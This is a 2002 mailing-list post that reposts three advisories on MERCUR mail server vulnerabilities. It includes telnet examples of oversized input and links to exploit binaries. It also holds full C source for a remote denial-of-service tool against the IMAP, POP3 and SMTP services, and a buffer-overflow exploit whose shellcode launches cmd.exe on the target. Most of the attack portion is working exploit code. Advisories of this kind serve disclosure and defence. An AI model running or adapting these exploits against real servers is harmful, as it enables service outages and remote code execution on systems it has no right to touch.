[Helpc] Mercur vulnerabilities
- From: "Shaka( Rudy)" <strub.rudy@xxxxxxxxx>
- To: <helpc@xxxxxxxxxxxxx>
- Date: Sat, 19 Oct 2002 12:34:36 +0200
Title
15/3/2000
Mercur POP3 / IMAP server vulnerable to DoS
Summary
UssrLabs found that the
<http://www.atrium-software.com/mercur/mercur_e.html> Mercur POP3 and
IMAP Server is vulnerable to a Denial of Service attack. The attack is
possible due to improper bounds checking.
Details
Vulnerable systems:
MERCUR Mailserver 3.2
MERCUR POP3-Server (v3.20.01) for Windows NT
MERCUR IMAP4-Server (v3.20.01) for Windows NT
Example:
$ telnet example.com 110
Trying example.com...
Connected to example.com.
Escape character is '^]'.
+OK MERCUR POP3-Server (v3.20.01 Unregistered) for Windows NT ready at
Tue, 14 M at 2000 03:30:39 -0300
user [buffer]
Where [buffer] is approximately 2000 characters.
$ telnet example.com 143
Trying example.com...
Connected to example.com.
Escape character is '^]'.
* OK MERCUR IMAP4-Server (v3.20.01 Unregistered) for Windows NT ready at
Tue, 14 Mar 2000 03:34:09 -0300
[buffer]
Where [buffer] is approximately 3000 characters.
Exploit:
Binary version of the POP3 DoS:
<http://www.ussrback.com/mercur/domrc32p.exe>
http://www.ussrback.com/mercur/domrc32p.exe
Binary version of the IMAP DoS:
<http://www.ussrback.com/mercur/domrc32i.exe>
http://www.ussrback.com/mercur/domrc32i.exe
Source code:
<http://www.ussrback.com/mercur/merc32ds.zip>
http://www.ussrback.com/mercur/merc32ds.zip
Additional information
The information was provided by: <mailto:labs%20at%20USSRBACK.COM> Ussr
Labs.
Title
14/6/2000
Mercur Mail server large buffer exploit code has been released
Summary
We already reported about the vulnerability in Mercur Mail server:
<http://www.securiteam.com/exploits/Mercur_POP3___IMAP_server_vulnerable
_to_DoS.html> Mercur POP3 / IMAP server vulnerable to DoS).
Now an exploit source code has been created to test for this
vulnerability.
Details
Vulnerable systems:
MERCUR Mailserver 3.2
Exploit:
/*
* Remote Denial of Service for Mercur 3.2
*
* (C) |[TDP]| - HaCk-13 TeaM - 2000 <tdp@xxxxxxxxxx>
*
*
* This code shows a Mercur 3.2 vulnerability in which, any remote
* user can cause server shutdown. Previous Mercur versions may be
* affected by this vulnerability.
*
* Greetings to all the other members and all my friends :)
*/
#include <stdio.h>
#include <stdlib.h>
#include <unistd.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <netdb.h>
#include <netinet/in.h>
#include <arpa/inet.h>
void
usage (char *progname)
{
fprintf (stderr, "Usage: %s <hostname> [type]\n", progname);
fprintf (stderr, " Type:\n");
fprintf (stderr, " 0 - IMAP4 (Default)\n");
fprintf (stderr, " 1 - POP3\n");
fprintf (stderr, " 2 - SMTP\n\n");
exit (1);
}
int
main (int argc, char **argv)
{
char *ptr, buffer[3000], remotedos[3100];
int aux, sock, type;
struct sockaddr_in sin;
unsigned long ip;
struct hostent *he;
fprintf (stderr,
"\n-= Remote DoS for Mercur 3.2 - (C) |[TDP]| - H13 Team =-\n");
if (argc < 2)
usage (argv[0]);
type = 0;
if (argc > 2)
type = atol (argv[2]);
ptr = buffer;
switch (type)
{
case 1:
memset (ptr, 0, 2048);
memset (ptr, 88, 2046);
break;
default:
memset (ptr, 0, sizeof (buffer));
memset (ptr, 88, sizeof (buffer) - 2);
break;
}
bzero (remotedos, sizeof (remotedos));
switch (type)
{
case 1:
snprintf (remotedos, sizeof (remotedos), "USER %s\r\n\r\n\r\n",
buffer);
break;
case 2:
snprintf (remotedos, sizeof (remotedos),
"MAIL FROM: %s@xxxxxxxxxxxxxx\r\n\r\n\r\n", buffer);
break;
default:
snprintf (remotedos, sizeof (remotedos), "1000 LOGIN
%s\r\n\r\n\r\n",
buffer);
break;
}
if ((sock = socket (AF_INET, SOCK_STREAM, IPPROTO_TCP)) < 0)
{
perror ("socket()");
return -1;
}
if ((he = gethostbyname (argv[1])) != NULL)
{
ip = *(unsigned long *) he->h_addr;
}
else
{
if ((ip = inet_addr (argv[1])) == NULL)
{
perror ("inet_addr()");
return -1;
}
}
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = ip;
switch (type)
{
case 1:
sin.sin_port = htons (110);
break;
case 2:
sin.sin_port = htons (25);
break;
default:
sin.sin_port = htons (143);
break;
}
if (connect (sock, (struct sockaddr *) &sin, sizeof (sin)) < 0)
{
perror ("connect()");
return -1;
}
switch (type)
{
case 1:
fprintf (stderr, "\nEngaged Mercur POP3... Sending data...\n");
break;
case 2:
fprintf (stderr, "\nEngaged Mercur SMTP... Sending data...\n");
break;
default:
fprintf (stderr, "\nEngaged Mercur IMAP4... Sending data...\n");
break;
}
if (write (sock, remotedos, strlen (remotedos)) < strlen (remotedos))
{
perror ("write()");
return -1;
}
sleep (4);
fprintf (stderr, "Bye Bye baby!...\n\n");
if (close (sock) < 0)
{
perror ("close()");
return -1;
}
return (0);
}
Additional information
The information has been provided by: <mailto:tdp%20at%20PSYNET.NET>
|[TDP]|
Title
1/3/2001
MERCUR Mailserver Buffer Overflow Vulnerability (EXPN)
Summary
<http://www.atrium-software.com/mercur/mercur_e.html> MERCUR offers the
necessary features to provide an efficient and effective communications
medium. A security vulnerability in the product allows remote attackers
to cause the product to crash causing it to execute arbitrary code.
Details
Vulnerable systems:
MERCUR Mailserver version 3.3
Example:
< 220 MERCUR SMTP-Server (v3.30.03 Unregistered) for Windows NT ready at
Thu, 15 Feb 2001 03:55:34 -0800
> EXPN AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAA
Connection to host lost.
Exploit:
This exploit runs an instance of cmd.exe on target host:
/*
MERCUR Mailserver 3.3 Remote Buffer Overflow
Tested on Win2K AS SP1 with MERCUR SMTP-
Server v3.30.03
Martin Rakhmanoff
martin@xxxxxxxxxxxxx
*/
#include <winsock2.h>
#include <stdio.h>
/* \x63\x6D\x64\x2E\x65\x78\x65 - simply 'cmd.exe' */
char shellcode[] =
"\x8B\xC4\x83\xC0\x17\x50\xB8\x0E\xB5\xE9\x77
\xFF\xD0\x33\xDB\x53"
"\xB8\x2D\xF3\xE8\x77\xFF\xD0\x63\x6D\x64
\x2E\x65\x78\x65\x0D\x0A";
/*
In SoftICE bpx 001b:00418b65 - here eip is restored
with overwritten
value...
*/
int main(int argc, char * argv[]){
int i;
char sploit[512];
char buffer[512];
WSADATA wsaData;
SOCKET sock;
struct sockaddr_in server;
struct hostent *hp;
WSAStartup(0x202,&wsaData);
hp = gethostbyname("arena");
memset(&server,0,sizeof(server));
memcpy(&(server.sin_addr),hp->h_addr,hp-
>h_length);
server.sin_family = hp->h_addrtype;
server.sin_port = htons(25);
sock = socket(AF_INET,SOCK_STREAM,0);
connect(sock,(struct sockaddr*)&server,sizeof
(server));
sploit[0]='E';
sploit[1]='X';
sploit[2]='P';
sploit[3]='N';
sploit[4]=0x20;
for(i=5;i<137;i++){
sploit[i]=0x41;
}
// Return address
//77E87D8B
sploit[137]=0x8B;
sploit[138]=0x89;
sploit[139]=0xE8;
sploit[140]=0x77;
for(i=0;i<sizeof(shellcode);i++){
sploit[i+141]=shellcode[i];
}
recv(sock,buffer,512,0);
send(sock,sploit,173,0);
closesocket(sock);
WSACleanup();
return 0;
}
Vendor Status:
Vendor was notified, and is working on a solution.
Additional information
The information has been provided by
<mailto:martin%20at%20DIRECT.SPB.RU> Martin NA.
--->
Shaka( Rudy)
Helpc list owner
<mailto:shaka.rudy@xxxxxxxxx> shaka.rudy@xxxxxxxxx
Other related posts:
- » [Helpc] Mercur vulnerabilities
